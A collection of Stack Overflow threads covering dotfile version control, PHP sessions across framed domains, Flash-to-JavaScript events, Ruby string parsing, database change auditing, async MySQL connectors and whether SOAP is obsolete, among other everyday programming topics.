A: git or Mercurial's cheap branching would work great for this situation. I started with Mercurial, because it is simpler, but have subsequently moved to git.
A: One way to handle this very flexibly is to have a build directory under revision control, rather than trying to svn your actual home directory (which has its own issues).
So inside this you keep a structure like:
/home/you/code/dotfiles
/home/you/code/dotfiles/dotbashrc
/home/you/code/dotfiles/dotemacs
...
/home/you/code/dotfiles/makefile
and the makefile can contain logic for specializing files (or not)
This might be heavier than you need, but if your actual setup is complex (I've done this across 3 or 4 different Unices at a time) then it's worth doing something like this.
A: I use git for this. So far, I have been able to keep the home directories on several machines synchronized, with no need for branching and merging. Instead, I use git rebase. Conflicts so far have been few and far between and easy to resolve.
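For what it's worth, the day-to-day sync on each machine boils down to something like this (the remote and branch names are whatever you set up):
cd ~
git add -A
git commit -m "dotfile tweaks on this machine"
git pull --rebase origin master   # replay local commits on top of the other machines' changes
git push origin master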
I keep files that need to have separate contents out of revision control by putting them into .gitignore.
I keep configuration files for the following tools in git:
*
*various shells
*emacs and applications, i.e.
*
*gnus
*BBDB
*emacs-w3m
*mutt
*screen
*various utilities and scripts
I keep notes and such in a subdirectory which has its own git repository.
A: I would suggest looking into etckeeper if you haven't already. It's designed for versioning configuration files in /etc using a version control system:
etckeeper is a collection of tools to
let /etc be stored in a git,
mercurial, darcs, or bzr repository.
It hooks into apt (and other package
managers including yum and pacman-g2)
to automatically commit changes made
to /etc during package upgrades. It
tracks file metadata that revison
control systems do not normally
support, but that is important for
/etc, such as the permissions of
/etc/shadow. It's quite modular and
configurable, while also being simple
to use if you understand the basics of
working with revision control.
Although it's designed for /etc I think it would probably also work well (perhaps with some adaptation) for home directories since the basic needs are the same.
A: I know this is an old thread but found it while searching for some dotfiles.
My current system is using Subversion. The key thing I did was check out the working copy into ~/.svnhome/ (in hindsight I should have called it .dotfiles or something more generic). I then create symlinks to the files I actually use on that computer into home. For example, my .procmail and .spamassassin folders are only needed on the mail server, so I don't link those on my home server.
The only file that has some differences is the .bashrc file has some extra lines on my mac for macports. So at the bottom of .bashrc I have it check if .bashrc_local exists and parses that.
This is the last remaining thing I have using Subversion (everything else is using git aside from work). The benefit of svn is that, because it's not a DVCS, I don't have to worry about accidentally committing on one server and forgetting to push it.
I have considered moving it to git so I could create branches. Using the above example I would have a branch for my main server that I would add the .procmail and .spamassassin folders but not have those in the master branch. But the current system has worked fine for years--before git even existed--and don't have any particular motivation to change it now.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38362",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: PHP : session variable aren't usable when site is redirected I have to admin a small website for my alumni group which is hosted by my ISV. The url is something like www.myIsv.com/myWebSite/ which is quite ugly and very forgettable. The main admin of the webserver has registered a domain name www.mysmallwebsite.com and put an index.html with this content:
<html>
<head>
<title>www.mysmallwebsite.com</title>
</head>
<frameset>
<frame src="http://www.myIsv.com/myWebSite/" name="redir">
<noframes>
<p>Original location:
<a href="www.myIsv.com/myWebSite/">http://www.myIsv.com/myWebSite/</a>
</p>
</noframes>
</frameset>
</html>
It works fine, but some features like PHP session variables don't work anymore!
Edit:
This doesn't work both on IE and on Firefox (no plugins)
Thanks
A: Sessions are tied to the server AND the domain. Using frameset across domain will cause all kind of breakage because that's just not how it was designed to do.
Try using Apache mod_rewrite to create a "passthrough redirection"; the "proxy" flag ([P]) in the rule is the magic flag that you need.
Documentation at http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
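A minimal sketch of such a proxy rule for the vhost serving www.mysmallwebsite.com (mod_proxy has to be enabled for the [P] flag to work):
RewriteEngine On
RewriteRule ^/(.*)$ http://www.myIsv.com/myWebSite/$1 [P,L]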
A: What do you mean?
Are you saying that when you go from www.mysmallwebsite.com to www.myIsv.com/myWebSite/ then the PHP session is lost?
PHP recognizes the session with an ID (alpha-numeric hash generated on the server). The ID is passed from request to request using a cookie called PHPSESSID or something like that (you can view the cookies a website sets with the help of your browser ... on Firefox you have Firebug + FireCookie and the wonderful Web Developer Toolbar ... with which you can view the list of cookies without breaking a sweat).
So ... PHP is passing the session ID through the PHPSESSID cookie. But you can pass the session ID as a plain GET request parameter.
So when you place the html link to the ugly domain name, assuming that it is the same PHP server (with the same sessions initialized), you can put it like this ...
www.myIsv.com/myWebSite/?PHPSESSID=<?=session_id()?>
I haven't worked with PHP for a while, but I think this will work.
A: Do session variables work if you hit http://www.myIsv.com/myWebSite/ directly? It would seem to me that the server config would dictate whether or not sessions will work. However, if you're starting a session on www.mysmallwebsite.com somehow (doesn't look like you're using PHP, but maybe you are), you're not going to be able to transfer session data without writing some backend logic that moves the session from server to server.
A: Stick a session_start() at the beginning of your script and see if you can access the variables again.
A: It's not working because on the client sessions are per-domain. All the cookies are being saved for mysmallwebsite.com, so myIsv.com cannot access them.
A: @pix0r
www.myIsv.com/myWebSite/ -> session variable work
www.mysmallwebsite.com -> session variable doesn't work
@Alexandru
Unfortunately this is not on the same webserver
A: What browser/add-on do you have? It may be that your browser or some other software (maybe even the web server) is blocking the sessions from http://www.myIsv.com/myWebSite/ working from within the frame, as it's located on a different site, thinking it's an XSS attack.
If the session works at http://www.myIsv.com/myWebSite/ without the frame, you could always use a redirect from http://www.mysmallwebsite.com to the ugly url, instead of using the frame.
EDIT:
I have just tried your frame code on a site of mine that uses sessions; Firefox worked fine, with me logging in and staying logged in, but IE7 logged me straight out again.
A:
So when you place the html link to the ugly domain name, assuming that it is the same PHP server (with the same sessions initialized), you can put it like this ...
www.myIsv.com/myWebSite/?PHPSESSID=<?=session_id()?>
From a security point of view, I really really really hope that doesn't work
A: You could also set a cookie on the user-side and then check for the presence of that cookie directly after redirecting, which if you're bothered about friendly URLs would mean that you don't have to pass around a PHPSESSID in the query string.
A: When people arrive @ www.mysmallwebsite.com I would just redirect to http://www.myIsv.com/myWebSite/
<?php header('Location: http://www.myIsv.com/myWebSite/'); ?>
This is all I would have in www.mysmallwebsite.com/index.php
This way you don't have to worry about browser compatibility, or whether the sessions work; just do the redirect, and you'll be good.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38370",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Clone a control in silverlight What's the best way to clone a control in Silverlight (including it's children)?
UPDATE
Is there a better way in Silverlight 2?
A: Here's a great thread about serializing and deserializing objects in Silverlight 1.1.
As for a "best way," I'd say it would definitely be caching the xaml for the control and calling createFromXaml on it.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38378",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How can I make flash cs3, actionscript send events to javascript? I'm using Flash to play an .flv movieclip on my site, but I want to have the .swf trigger an event in my JavaScript when it starts loading, starts playing and ends playing.
What is the best way to do that in Flash CS3 using Actionscript 3.0 ?
A: You need to use the "allowScriptAccess" flash variable in the HTML. You probably want to use "sameDomain" as the type. Note that if you go cross-domain, you also need to host a special file on the server called 'crossdomain.xml' which enables such scripting (the flash player will check for this. More info at http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_14213&sliceId=2
The call is the easy part. :-) In the Flash code, you'll use the ExternalInterface to do the call, as documented here:
http://livedocs.adobe.com/flash/9.0/main/wwhelp/wwhimpl/common/html/wwhelp.htm?context=LiveDocs_Parts&file=00001655.html
Short version: you say
ExternalInterface.call("javascriptFunction", "argument")
A: A common way to do this is with the ExternalInterface class, which you can use to call JavaScript methods.
First define your JavaScript methods, for example:
<script language="JavaScript">
function startsPlaying()
{
// do something when the FLV starts playing
}
</script>
Then modify your ActionScript to call the JavaScript method at the appropriate time:
// inform JavaScript that the FLV has started playing
ExternalInterface.call("startsPlaying");
For more information, see the related Flash CS3 documentation.
A: If you don't want to load
import flash.external.*;
you can also do a
getUrl("javascript:startsPlaying();");
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38408",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How do I convert a Ruby string with brackets to an array? I would like to convert the following string into an array/nested array:
str = "[[this, is],[a, nested],[array]]"
newarray = # this is what I need help with!
newarray.inspect # => [['this','is'],['a','nested'],['array']]
A: You could also treat it as almost-JSON. If the strings really are only letters, like in your example, then this will work:
JSON.parse(yourarray.gsub(/([a-z]+)/,'"\1"'))
If they could have arbitrary characters (other than [ ] , ), you'd need a little more:
JSON.parse("[[this, is],[a, nested],[array]]".gsub(/, /,",").gsub(/([^\[\]\,]+)/,'"\1"'))
A: For a laugh:
ary = eval("[[this, is],[a, nested],[array]]".gsub(/(\w+?)/, "'\\1'") )
=> [["this", "is"], ["a", "nested"], ["array"]]
Disclaimer: You definitely shouldn't do this as eval is a terrible idea, but it is fast and has the useful side effect of throwing an exception if your nested arrays aren't valid
A: You'll get what you want with YAML.
But there is a little problem with your string. YAML expects that there's a space behind the comma. So we need this
str = "[[this, is], [a, nested], [array]]"
Code:
require 'yaml'
str = "[[this, is],[a, nested],[array]]"
### transform your string in a valid YAML-String
str.gsub!(/(\,)(\S)/, "\\1 \\2")
YAML::load(str)
# => [["this", "is"], ["a", "nested"], ["array"]]
A: Looks like a basic parsing task. Generally the approach you are going to want to take is to create a recursive function with the following general algorithm
base case (input doesn't begin with '[') return the input
recursive case:
split the input on ',' (you will need to find commas only at this level)
for each sub string call this method again with the sub string
return array containing the results from this recursive method
The only slightly tricky part here is splitting the input on a single ','. You could write a separate function for this that would scan through the string and keep a count of the open brackets minus closed brackets seen so far. Then only split on commas when the count is equal to zero.
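For reference, a rough Ruby sketch of that splitting approach (my own illustration, assuming well-formed input):
def parse_nested(str)
  return str.strip unless str.strip.start_with?('[')
  inner = str.strip[1..-2]          # drop the outer brackets
  parts, depth, current = [], 0, ''
  inner.each_char do |ch|
    depth += 1 if ch == '['
    depth -= 1 if ch == ']'
    if ch == ',' && depth == 0      # split only on top-level commas
      parts << current
      current = ''
    else
      current << ch
    end
  end
  parts << current unless current.empty?
  parts.map { |p| parse_nested(p) }
end

parse_nested("[[this, is],[a, nested],[array]]")
# => [["this", "is"], ["a", "nested"], ["array"]]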
A: Make a recursive function that takes the string and an integer offset, and "reads" out an array. That is, have it return an array or string (that it has read) and an integer offset pointing after the array. For example:
s = "[[this, is],[a, nested],[array]]"
yourFunc(s, 1) # returns ['this', 'is'] and 11.
yourFunc(s, 2) # returns 'this' and 6.
Then you can call it with another function that provides an offset of 0, and makes sure that the finishing offset is the length of the string.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38409",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Security advice for jquery ajax data post? I'm using jquery ajax to post updates back to my server. I'm concerned about making sure I have put in place appropriate measures so that only my AJAX calls can post data.
My stack is PHP on Apache against a MySQL backend.
Advice greatly appreciated!
A: Use sessions to ensure that any Ajax posts are done in an authenticated context. Think of your Ajax code as just another client to your server, it becomes easier to tackle authentication issues that way.
A: Any request that the AJAX calls in your pages can make can also be made by someone outside of the application. If done right, you will not be able to tell if they were made as part of an AJAX call from your webapp or by hand/other means.
There are two scenarios I can think of which you might be talking about when you say you want to make sure that only your AJAX calls can post data: either you don't want a malicious user to be able to post data that interferes with another user's data or you actually want to restrict the posts to being in the "flow" of a multi-request operation.
If you are concerned with the first case (someone posting malicious data to/as another user) the solution is the same whether you are using AJAX or not -- you just have to authenticate the user through whatever means is necessary -- usually via session cookie.
If you are concerned with the second case, then you are going to have to do something like issue a unique token at each step of the process, and store the expected token on the server side. Then when a request is made, check that there is a corresponding entry on the server side for the action being taken, that the expected tokens match, and that the token has not been used yet. If there is no match, reject the request; if there is, mark that token as used and process the request.
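A minimal PHP sketch of that one-time-token idea (illustrative only; the session key and field names are made up, and you would adapt it to your own flow):
<?php
session_start();

// When rendering the page/step, issue a token and embed it in the page
// so the jQuery call can POST it back:
$_SESSION['form_token'] = md5(uniqid(mt_rand(), true));

// When handling the AJAX POST:
if (!isset($_POST['token'], $_SESSION['form_token'])
        || $_POST['token'] !== $_SESSION['form_token']) {
    header('HTTP/1.1 403 Forbidden');
    exit('Invalid token');
}
unset($_SESSION['form_token']); // mark the token as used
// ...process the request...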
If what you are concerned about is something other than one of these two scenarios then the answer will depend on more specifics than you have provided.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38421",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Tips for working in a large library? I'm currently working on a quite large library (5M lines of code, in C++ under VS2005, 1 solution and close to 100 projects). Even though we distribute compilation, and use incremental linking, recompilation and relinking after small source modifications takes between a few minutes (usually at least 3) and close to one hour.
This means that our modify code/build/debug cycles tend to be really long (to my taste!), and it's quite easy to lose the 'flow' during a build: there's typically not much time to do anything useful (maybe do a bit of email, otherwise read some article online or a few pages of a book).
When writing new code or doing major refactoring, I try to compile one file at a time only. However, during debugging for example, it really gets on my nerves!
I'm wondering how I could optimize my time? I guess I'm not the only one in that situation: what do/would you do?
A: I don't know much about development at that level, but... it seems like it would be a good idea to separate into multiple solutions. You could have a final "pre-ship" step that consolidates them all into a single .dll if you/your customers really insist.
Compare, e.g., to the .NET Framework where we have lots of different assemblies (System, System.Drawing, System.Windows.Forms, System.Xml...). Presumably all of these could be in different solutions, referencing each other's build results (as opposed to all in a single solution, referencing each other as projects).
A: Step by step...
The only solution is to start isolating blocks of code. If you don't have too much implementation leakage (see below **) then start building facades that isolate the classes behind them. Move those classes to a different project and make the facade load the DLLs on startup and redirect the calls to factory methods.
Focus on finding areas/libraries that are fairly stable and split them to isolated library dlls. Building and versioning them separately will help you to avoid integration pains.
I have been in that situation in the past and the only way is to take on the task with patience.
By the way, a good side effect of splitting code is that interfaces become cleaner and the output DLL size is smaller!! In our project, shuffling/reorganizing the code around and reducing the amount of gratuitous includes reduced the final output by 30%.
good luck!
** --> a consumer calling obj->GetMemberZ()->GetMemberYT()->GiveMeTheData(param1, param2)
A: @Domenic: indeed, it would be a good thing... However, a whole team's been at it for some time now, and until they succeed we are stuck with a single .dll and something quite monolithic :-(
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38427",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Positioning controls in the middle of a CheckBox This is a followup to my previous question "Font-dependent control positioning." It's an attempt to solve the real problem behind that question, perhaps in ways different than the one I was asking about.
Example of the problem statement: I want a checkbox that says "Adjust prices by <X> <Y> after loading," where <X> is a number---adjustable with a NumericUpDown---and <Y> is either "percent" or "dollars," with the choices being made by a ComboBox. This will be on a single line.
The complication: I want to be able to change my fonts for all these controls (basically setting them to System.Drawing.SystemFonts.MessageBoxFont, which is Tahoma 8 pt on Windows XP/etc. and Segoe UI 9 pt on Vista), without messing up my layout, which with my current Position-property-setting paradigm does not work.
More generally, I'd like the controls to be dynamically laid out in a font-independent way, so that the <X> NumericUpDown fits snugly into the space between "by " and the <Y> ComboBox, and similarly the <X> ComboBox fits in with respect to the <X> CheckBox and the string " after loading" to its right.
The part everyone seems to miss: This is all nested within a CheckBox. So, ideally, clicking on the words "after loading" should check/uncheck the checkbox, and draw that little highlight rectangle around "Adjust prices by after loading." So just slapping an extra Label on the end doesn't work, because then it doesn't toggle the CheckBox; similarly, trying to band-aid things by hooking up such a Label's Click event won't produce the desired highlight-rectangle.
Solutions? At this point I'm thinking either:
*
*Rethink the problem, somehow, maybe with an ugly solution like two separate lines of text: "Adjust found prices after loading" (CheckBox), "Adjustment amount:" (NumericUpDown and ComboBox). This is really bad because my options box is absolutely full of options of this type (i.e. the type in the example), so it would at least double in vertical size.
*Some sort of custom control? SplittableCheckBox?
*Some kind of magic with a TableLayout control? (Pretty sure this fails at "the part everyone seems to miss.")
*Give up and either go back to MS Sans Serif, or use Tahoma uniformly, or package Segoe UI with my application, thus disrespecting the system default fonts.
*(New, via edit) Switch to WPF, if someone can convince me that it supports this scenario exactly.
A: If you have several options that follow this layout, why not create a user control? The user control will contain the CheckBox, a NumericUpDown, a ComboBox and a label for the "after loading". You can override OnFontChanged to adjust the location of the controls based on the rendering of the text with the given font. Add an EventHandler to the Label to check/uncheck the CheckBox.
As for having the focus rectangle surround all of the controls, you should be able to give the user control focus when one of its inner controls is clicked.
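A rough sketch of that font-dependent layout logic (WinForms; the control names and literal text here are placeholders for whatever the user control actually contains):
protected override void OnFontChanged(EventArgs e)
{
    base.OnFontChanged(e);
    LayoutParts();
}

private void LayoutParts()
{
    // Measure the leading text with the current font and snug the other
    // controls up against it.
    Size lead = TextRenderer.MeasureText("Adjust prices by ", this.Font);
    amountUpDown.Left = priceCheckBox.Left + lead.Width;
    unitComboBox.Left = amountUpDown.Right + 4;
    afterLabel.Left   = unitComboBox.Right + 4;
}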
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38428",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: ASP.NET MVC - How do action names affect the url? Using MVC out of the box I found the generated URLs can be misleading and I wanted to know if this can be fixed or if my approach/understanding is wrong.
Suppose I have a CreateEgg page, which has a form on it, and once the form is filled in and submitted the user is taken to a ListEggs page with the new egg in it.
So my egg controller will look some thing like this:
public class EggController : Controller
{
public void Add()
{
//do stuff
RenderView("CreateEgg", viewData);
}
public void Create()
{
//do stuff
RenderView("ListEggs", viewData);
}
}
So my first page will have a url of something like http://localhost/egg/add and the form on the page will have an action of:
using (Html.Form<EggController>(c => c.Create()))
Meaning the second page will have a URL of http://localhost/Egg/Create. To me this is misleading: the action should be called Create, because I'm creating the egg, but a list view is being displayed, so the URL http://localhost/Egg/List would make more sense. How do I achieve this without making my view or action names misleading?
A: The problem is your action does two things, violating the Single Responsibility Principle.
If your Create action redirects to the List action when it's done creating the item, then this problem disappears.
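As a sketch of that separation (written against later MVC previews/releases where actions return ActionResult; the Egg model and repository here are assumptions):
public ActionResult Create(Egg egg)
{
    // ...save the egg...
    return RedirectToAction("List"); // the browser ends up at /Egg/List
}

public ActionResult List()
{
    return View("ListEggs", repository.GetAllEggs()); // assumed repository
}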
A: The ActionVerbs outlined in Scott Gu's post seem to be a good approach;
Scott says:
You can create overloaded implementations of action methods, and use a new [AcceptVerbs] attribute to have ASP.NET MVC filter how they are dispatched. For example, below we can declare two Create action methods - one that will be called in GET scenarios, and one that will be called in POST scenarios
[AcceptVerbs("GET")]
public object Create() {}
[AcceptVerbs("POST")]
public object Create(string productName, Decimal unitPrice) {}
A: How A Method Becomes An Action by Phil Haack
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38431",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Retrieving an Oracle timestamp using Python's Win32 ODBC module Given an Oracle table created using the following:
CREATE TABLE Log(WhenAdded TIMESTAMP(6) WITH TIME ZONE);
Using the Python ODBC module from its Win32 extensions (from the win32all package), I tried the following:
import dbi, odbc
connection = odbc.odbc("Driver=Oracle in OraHome92;Dbq=SERVER;Uid=USER;Pwd=PASSWD")
cursor = connection.cursor()
cursor.execute("SELECT WhenAdded FROM Log")
results = cursor.fetchall()
When I run this, I get the following:
Traceback (most recent call last):
...
results = cursor.fetchall()
dbi.operation-error: [Oracle][ODBC][Ora]ORA-00932: inconsistent datatypes: expected %s got %s
in FETCH
The other data types I've tried (VARCHAR2, BLOB) do not cause this problem. Is there a way of retrieving timestamps?
A: I believe this is a bug in the Oracle ODBC driver. Basically, the Oracle ODBC driver does not support the TIMESTAMP WITH (LOCAL) TIME ZONE data types, only the TIMESTAMP data type. As you have discovered, one workaround is in fact to use the TO_CHAR method.
In your example you are not actually reading the time zone information. If you have control of the table you could convert it to a straight TIMESTAMP column. If you don't have control over the table, another solution may be to create a view that converts from TIMESTAMP WITH TIME ZONE to TIMESTAMP via a string - sorry, I don't know if there is a way to convert directly from TIMESTAMP WITH TIME ZONE to TIMESTAMP.
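For what it's worth, a rough sketch of that view idea (untested; note the CAST simply drops the time zone information, and the view name is made up):
CREATE OR REPLACE VIEW Log_NoTz AS
SELECT CAST(WhenAdded AS TIMESTAMP) AS WhenAdded
FROM Log;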
A: My solution to this, that I hope can be bettered, is to use Oracle to explicitly convert the TIMESTAMP into a string:
cursor.execute("SELECT TO_CHAR(WhenAdded, 'YYYY-MM-DD HH:MI:SSAM') FROM Log")
This works, but isn't portable. I'd like to use the same Python script against a SQL Server database, so an Oracle-specific solution (such as TO_CHAR) won't work.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38435",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: How to track data changes in a database table What is the best way to track changes in a database table?
Imagine you have an application in which users (in the context of the application, not DB users) are able to change data which is stored in some database table. What's the best way to track a history of all changes, so that you can show which user changed which data, when, and how?
A: You've got a few issues here that don't relate well to each other.
At the basic database level you can track changes by having a separate table that gets an entry added to it via triggers on INSERT/UPDATE/DELETE statements. That's the general way of tracking changes to a database table.
The other thing you want is to know which user made the change. Generally your triggers wouldn't know this. I'm assuming that if you want to know which user changed a piece of data then its possible that multiple users could change the same data.
There is no single right way to do this; you'll probably want to have a separate table that your application code inserts a record into whenever a user updates some data in the other table, including the user, a timestamp and the id of the changed record.
Make sure to use a transaction so you don't end up with cases where the update gets done without the insert (or, if you do them in the opposite order, the insert without the update).
A: One method I've seen quite often is to have audit tables. Then you can show just what's changed, or what's changed and what it changed from, or whatever your heart desires :) Then you could write up a trigger to do the actual logging. Not too painful if done properly...
No matter how you do it, though, it kind of depends on how your users connect to the database. Are they using a single application user via a security context within the app, are they connecting using their own accounts on the domain, or does the app just have everyone connecting with a generic sql-account?
If you aren't able to get the user info from the database connection, it's a little more of a pain. And then you might look at doing the logging within the app, so if you have a process called "CreateOrder" or whatever, you can log to the Order_Audit table or whatever.
Doing it all within the app opens yourself up a little more to changes made from outside of the app, but if you have multiple apps all using the same data and you just wanted to see what changes were made by yours, maybe that's what you wanted... <shrug>
Good luck to you, though!
--Kevin
A: In researching this same question, I found a discussion here very useful. It suggests having a parallel table set for tracking changes, where each change-tracking table has the same columns as what it's tracking, plus columns for who changed it, when, and if it's been deleted. (It should be possible to generate the schema for this more-or-less automatically by using a regexed-up version of your pre-existing scripts.)
A: Suppose I have a Person Table with 10 columns which include PersonSid and UpdateDate. Now, I want to keep track of any updates in Person Table.
Here is the simple technique I used:
*
*Create a person_log table
create table person_log(date datetime2, sid int);
*Create a trigger on Person table that will insert a row into person_log table whenever Person table gets updated:
create trigger tr on dbo.Person
for update
as
insert into person_log(date, sid) select updatedDTTM, PersonSID from inserted
After any updates, query person_log table and you will be able to see personSid that got updated.
Same you can do for Insert, delete.
The above example is for SQL Server; let me know in case of any queries, or use this link:
https://web.archive.org/web/20211020134839/https://www.4guysfromrolla.com/webtech/042507-1.shtml
A: In general, if your application is structured into layers, have the data access tier call a stored procedure on your database server to write a log of the database changes.
In languages that support such a thing aspect-oriented programming can be a good technique to use for this kind of application. Auditing database table changes is the kind of operation that you'll typically want to log for all operations, so AOP can work very nicely.
Bear in mind that logging database changes will create lots of data and will slow the system down. It may be sensible to use a message-queue solution and a separate database to perform the audit log, depending on the size of the application.
It's also perfectly feasible to use stored procedures to handle this, although there may be a bit of work involved passing user credentials through to the database itself.
A: A trace log in a separate table (with an ID column, possibly with timestamps)?
Are you going to want to undo the changes as well - perhaps pre-create the undo statement (a DELETE for every INSERT, an (un-) UPDATE for every normal UPDATE) and save that in the trace?
A: Let's try with this open source component:
https://tabledependency.codeplex.com/
TableDependency is a generic C# component used to receive notifications when the content of a specified database table change.
A: If all changes come from PHP, you can use a class that logs every INSERT/UPDATE/DELETE before running the query. It can save the action, table, column, new value, old value, date, system (if needed), IP, user agent, column reference, operator reference and value reference. Which tables/columns/actions need to be logged can be made configurable.
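One possible shape of such a wrapper, as a sketch only (the change_log table and its columns are made up; error handling is omitted):
class LoggingDb {
    private $db;
    public function __construct(PDO $db) { $this->db = $db; }

    public function logAndRun($sql, $action, $table, $oldValue, $newValue) {
        $log = $this->db->prepare(
            "INSERT INTO change_log (action, tbl, old_value, new_value, ip, changed_at)
             VALUES (?, ?, ?, ?, ?, NOW())");
        $log->execute(array($action, $table, $oldValue, $newValue, $_SERVER['REMOTE_ADDR']));
        return $this->db->exec($sql);   // run the actual INSERT/UPDATE/DELETE
    }
}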
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38437",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "47"
} |
Q: Asynchronous Mysql connector Do any asynchronous connectors exist for Mysql that can be used within a C or C++ application? I'm looking for something that can be plugged into a reactor pattern written in Boost.Asio.
[Edit:] Running a synchronous connector in threads is not an option.
A: http://forums.mysql.com/read.php?45,183339,183339
enjoy
Updated link to the original article showing how to do async mysql queries:
http://jan.kneschke.de/projects/mysql/async-mysql-queries-with-c-api/
A: I had a similar problem with a very different technologies: Twisted python (reactor-based IO) and sqlAlchemy (??). While searching for a solution, I found about an sAsync project that simply created a separate thread for sqlAlchemy and then responded to requests.
Given that ASIO is based on low level OS features (such as aio_read() or ReadFileEx() etc) and an OS-level reactor (or proactor, in Windows' case) I don't think you have another chance than emulating the 'asynchronousness' by similar means.
Running a synchronous connector in threads is not an option
Think about it: the libmysqlclient / mysqlclient.dll you're using makes synchronous socket calls. The OS scheduler will correctly switch to another thread until the I/O is finished, so what's the difference? (apart from the fact that you shouldn't make 2k threads for this..)
Edit: mysql_real_connect() supports a UNIX socket parameter. You could supposedly read from the mysql server port yourself and write to that UNIX socket using only ASIO. Like a proxy.
A: [ Running a synchronous connector in threads is not an option
Think about it: the libmysqlclient / mysqlclient.dll you're using makes synchronous socket calls. The OS scheduler will correctly switch to another thread until the I/O is finished]
This is bugging me! The 'another thread' could just as easily be a second synchronous connection to mysql, and should be handled by mysql just as it would any other client altogether? My gut feeling is that it should work using multiple threads.
A: MySQL Connector/C++ is a C++ implementation of JDBC 4.0
The reference customers who use MySQL Connector/C++ are:
*
*OpenOffice
*MySQL Workbench
Learn more: http://forums.mysql.com/read.php?167,221298
A: I know this is an old question, but consider looking at the new Boost.Mysql library: https://anarthal.github.io/mysql/index.html
A: I think the only solution will be to create an asynchronous service that wraps a standard connector. You'll need to understand the ODBC APIs though.
A: There is a project called DBSlayer that puts another layer in front of MySQL that you talk to through JSON. http://code.nytimes.com/projects/dbslayer
A: Have you considered using libdrizzle? I have used only an old version, from when it was a separate project from drizzle, and I tested the asynchronous query features, but I never did any actual benchmarks worth mentioning.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38447",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Is SOAP now a legacy technology? Are people still writing SOAP services or is it a technology that has passed its architectural shelf life? Are people returning to binary formats?
A: The alternative to SOAP is not binary formats.
I think you're seeing a surge in the desire to leave the complexities of WS-* behind in favor of REST and JSON, because they're much simpler to use and don't require frameworks to be used successfully. The problems that WS-* ostensibly tries to solve aren't problems for most users, but they have to pay for the complexity any way.
A: I still write WS-*–based services. Somewhat surprisingly, I've had less trouble with them when trying to inter-operate with less capable developers. This is because if I send them a WSDL file, they know how to crank it through their tool and get an API they can call, while being blissfully unaware what is happening under the hood. To give customers a REST-ful service, I have to start talking to them about HTTP and XML, which they really don't understand as well as they think they do, and then I start getting a headache.
In other words, to be successful with REST, both the service provider and consumer have to know what they're doing (and they can keep things simple and come up with a great, non–WS-* solution). With WS-* technologies, it can still succeed even if only one party has a clue.
I think, however, that REST-oriented standards that are much less complicated than current WS standards, will eventually emerge, and when that happens, comparable tools will be available too.
A: I think so. RESTful solutions are more and more sensible for the vast majority of use cases; the complexities of SOAP and other RPC technologies just aren't worth the effort anymore.
A: I wouldn't consider SOAP legacy at all. REST vs. SOAP is really just the continuation of the debate of COM/CORBA vs. HTTP POST/GET etc. SOAP is nothing more than an updated version of the same principles defined with COM and CORBA (contracts, providers, consumers etc.). It's just that SOAP has appeared to succeed (at least partially) where the other two failed (and it could be that SOAP just has a better marketing team); that is, SOAP really does allow two different systems to connect rather easily compared to its predecessors. That being said, it still suffers from the same drawbacks that COM/CORBA did... it can get really complex.
I think REST is just coming back into style at the moment. It's nothing new, people are just taking another look at it. Look at the web. It's REST and it's been around for years. 5 years from now people are going to look back and say the same thing about it being legacy and the need to change. It's the nature of software development. Everything goes in cycles.
The debate about which one is better is going to be just like the tabs vs. spaces debate. There are going to be people on different sides swearing that one is better. Really in the end, they both accomplish the same goal. Sure one will be a better solution than the other in some situations, but in the end neither will be superior 100% of the time.
A: We were using SOAP, but since we control both messaging endpoints (thick client out on the web connecting to our servers) we decided that the "lingua franca" of XML wasn't offering any real benefit. Instead, we're experimenting with binary serialization via Google protocol buffers, and like everything we've learned so far. It's somewhat CORBA-esque, but doesn't make me grumpy the way CORBA did. Still haven't found the best fit for the RPC layer, but pretty sure the payload will be protocol buffers.
The point I'm trying to make is that if you control both sides of the conversation, there are significant efficiency advantages in bypassing the XML tax.
A: Yes, some people still are (and now it's 2011!). I think the main reason is that MS WCF automatically generates SOAP bindings. The horror.
A: It's impossible to define what the best technology solution is without considering what the problem is, in other words, what the context is. Both REST and SOAP have their place. If you have a high traffic site and a development audience who is comfortable with REST, then SOAP would be a bad choice, primarily because the message size is so incredibly bloated. If you have small scale site with a modest development budget, then SOAP will be a superior choice due to automatic proxy generation from WSDL. To make a fair comparison, it should be mentioned that implementing a REST conversation takes more development time and therefore is more expensive, a very relevant fact for your boss.
While it is true that SOAP is a more complicated protocol, in my experience this doesn't translate to maintainability issues. That's because messages ride on HTTP and can be easily debugged just like REST messages, and the SOAP stacks available on major platforms are very solid.
The complexity of SOAP is of course an advantage if your requirements include sophisticated items like federated message security. On the other hand, these kinds of requirements are not seen that often in my experience. The WS standards committee may have been vulnerable to some YAGNI issues. Now that web service communication is commonplace, it's turning out to be simpler than was originally envisioned.
| {
"language": "en",
